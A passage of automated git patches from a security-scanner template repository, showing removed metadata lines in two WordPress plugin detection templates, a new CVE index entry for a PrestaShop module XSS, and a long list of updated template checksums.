b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From a655c5c4e7ef84751228a76f192b6c828bea9c2e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 13 Sep 2023 06:06:42 +0000 Subject: [PATCH 0335/1090] Auto Generated cves.json [Wed Sep 13 06:06:42 UTC 2023] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 6057ababf0..ca0404347b 100644 --- a/cves.json +++ b/cves.json @@ -2015,6 +2015,7 @@ {"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"} {"ID":"CVE-2023-39598","Info":{"Name":"IceWarp Email Client - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39598.yaml"} {"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"} +{"ID":"CVE-2023-39676","Info":{"Name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","Severity":"medium","Description":"Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39676.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 797c53d907..35ae0472be 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -94ab0ea203148a351347fbd7445877bd +0fa9dbb5fa304e174cf185b9d13b1a48 From bad5444200ea765ec24752a2af8a0c082e362627 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 13 Sep 2023 06:06:57 +0000 Subject: [PATCH 0336/1090] Auto Generated Templates Checksum [Wed Sep 13 06:06:57 UTC 2023] :robot: --- templates-checksum.txt | 424 ++++++++++++++++++++--------------------- 1 file changed, 212 insertions(+), 212 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bf75f812ee..575e98e7d5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -395,7 +395,7 @@ helpers/wordpress/plugins/complianz-gdpr.txt:b12395a5190cbd66359bb94c3f32f0635e3 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/contact-form-7.txt:77526ddfb1469f41739fcab554059141c36d9329 helpers/wordpress/plugins/contact-form-cfdb7.txt:c6802dfc6ada46af8820db93c237d00787bd441c -helpers/wordpress/plugins/cookie-law-info.txt:049a35ad82b9c914dc50f602563d1e37e06ef9a6 +helpers/wordpress/plugins/cookie-law-info.txt:67de27fd6cf8d4bc1ad0b22499ec7f87a1acf6c4 helpers/wordpress/plugins/cookie-notice.txt:6b67ce6c1930ff8e1d5003aeb8218f8fbdd4e6d2 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:5c09cf3589e93781df4d59ed6b5a5d6207e2929c @@ -412,7 +412,7 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 -helpers/wordpress/plugins/elementor.txt:ce20893b5464bf83cbb5cf7c0ec4e9b5affd8fa5 +helpers/wordpress/plugins/elementor.txt:24ec44a43838c484230d02510aa13a65219a6d18 helpers/wordpress/plugins/elementskit-lite.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 @@ -425,7 +425,7 @@ helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c helpers/wordpress/plugins/fluentform.txt:f895a9e27c38f0528f64c2fa5b6072dceb0e4e27 helpers/wordpress/plugins/font-awesome.txt:4cb6b226aa8498265c8ea84adcf05e5e168e17c1 helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 -helpers/wordpress/plugins/formidable.txt:f6f8ec8cee0642425740179c78f2bf7d0a6572f1 +helpers/wordpress/plugins/formidable.txt:8f2885526d8144ff6d537a7c072cbed12891cf6e helpers/wordpress/plugins/forminator.txt:b4b8f80f2ea205ffb78bb802455b396e7c718699 helpers/wordpress/plugins/ga-google-analytics.txt:48c07757afb07916aaceb81724ecfe2e17de1bc9 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:9e4d99fe9543741fae861b8214e954feb69c7c36 @@ -454,7 +454,7 @@ helpers/wordpress/plugins/jetpack-boost.txt:d03f659256ae48f1c9a26c5aaec38d436048 helpers/wordpress/plugins/jetpack.txt:90db4c034fdf9f384fce435b9f9b57de9906c45c helpers/wordpress/plugins/kadence-blocks.txt:76352622a937abb841a04340015012a42290add0 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa -helpers/wordpress/plugins/leadin.txt:4ea6749184af2616dda4c6d36597b267338ca299 +helpers/wordpress/plugins/leadin.txt:78702f4ab9863ce2deba27117b027181e59b6e3d helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4b37c29fba8babd654bfb5f26219010dd1bf03f8 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:a2246273db175b4d951c8ae09a9b87d55b422463 @@ -463,7 +463,7 @@ helpers/wordpress/plugins/loginizer.txt:9829113ed356f261f9202f78259f32919e9e5d9b helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:d962fd9a839a218de0c95dddb4f7e937cdd40d38 -helpers/wordpress/plugins/mailpoet.txt:e779613ff1acc7ee99576cbf9159c456876a34b2 +helpers/wordpress/plugins/mailpoet.txt:92d82db05edd26b434ac5026c2bc3a9270d079d3 helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b924 helpers/wordpress/plugins/mainwp-child.txt:4fd5e5d395c7cb4645820b58e23fdf6fe34349ab helpers/wordpress/plugins/malcare-security.txt:24e26a42407173a638a100c03fae8fc56d72c5e3 @@ -484,12 +484,12 @@ helpers/wordpress/plugins/password-protected.txt:5f099bc6f95ad230bf3e17b9745270e helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pinterest-for-woocommerce.txt:01bb70d2c31d6761b11228cfd235f5be71cefeef +helpers/wordpress/plugins/pinterest-for-woocommerce.txt:4119e202faec947c57ff360c949b277fd6c29cd4 helpers/wordpress/plugins/pixelyoursite.txt:f358a15cc523a1f31429fce832dc8c0c554fc41b helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0 helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe -helpers/wordpress/plugins/post-smtp.txt:794118d2e1b864c8abdfea3e2039d9de9f0c9e16 +helpers/wordpress/plugins/post-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b helpers/wordpress/plugins/premium-addons-for-elementor.txt:fba90fa57ee2b5dbb2faec1c33e96813ccb14fd5 helpers/wordpress/plugins/pretty-link.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea33a @@ -500,7 +500,7 @@ helpers/wordpress/plugins/redux-framework.txt:1375dc6042d338e0d6b89174d9c404b7eb helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 helpers/wordpress/plugins/safe-svg.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/seo-by-rank-math.txt:a43557d2fb8277db824695f3e651c31ef604fac4 -helpers/wordpress/plugins/sg-cachepress.txt:4b3ee513f62e0368db5c1409e926fc99b39d00c8 +helpers/wordpress/plugins/sg-cachepress.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d3687aaa helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4 helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:4f019608acb19092704e77b812587f75a4baed71 @@ -541,7 +541,7 @@ helpers/wordpress/plugins/woocommerce-payments.txt:f96eaecad7005b860741ecc59d483 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/woocommerce-services.txt:17b06b2486a051055e43ae1127e87196d505e2f3 -helpers/wordpress/plugins/woocommerce.txt:758e3631d239f1de32442015f0033cc31a84dcec +helpers/wordpress/plugins/woocommerce.txt:64d44d34deaede28573d0e54fa7745978d9d2bd7 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40784b4a67e4ba8b48f28ea24427fa8550433cc1 helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8 @@ -557,7 +557,7 @@ helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4de helpers/wordpress/plugins/wp-optimize.txt:a80f092daaa12261340a5e337b2b07581bbb7e67 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a -helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:426199ebb361539300f123ea7dac4754ee0bef13 +helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:d343c69967f4ab0a58418b4f52fe9d4c4e39841f helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/wp-seopress.txt:75c41cf137a9a31823a6e465d81658ce9077457c helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 @@ -2187,7 +2187,7 @@ http/cves/2022/CVE-2022-23779.yaml:0281520c7ca3ec81144fcc1e9eff4cc00649b756 http/cves/2022/CVE-2022-2379.yaml:48dd2501f591e48394bc49c2d4f277fe276a6800 http/cves/2022/CVE-2022-23808.yaml:040e4615cd75402f4dbd464c52b91eea040eb9f1 http/cves/2022/CVE-2022-2383.yaml:d142046fca07a1bbf19ef82a7a3d482634b2d9eb -http/cves/2022/CVE-2022-23854.yaml:aaeb9decb51470ee466d08679b274da31ea2c10a +http/cves/2022/CVE-2022-23854.yaml:a7043a3d1e0769583653c398927d9dd93b50b045 http/cves/2022/CVE-2022-23881.yaml:60241d54491ffc8e1b65a5517abad42212552c6d http/cves/2022/CVE-2022-23898.yaml:1cc59291ca0baead4f20146ce5fc950fd4360318 http/cves/2022/CVE-2022-23944.yaml:bda212b62c0c9e3a287a4693dd09d99c055ebb96 @@ -5818,218 +5818,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 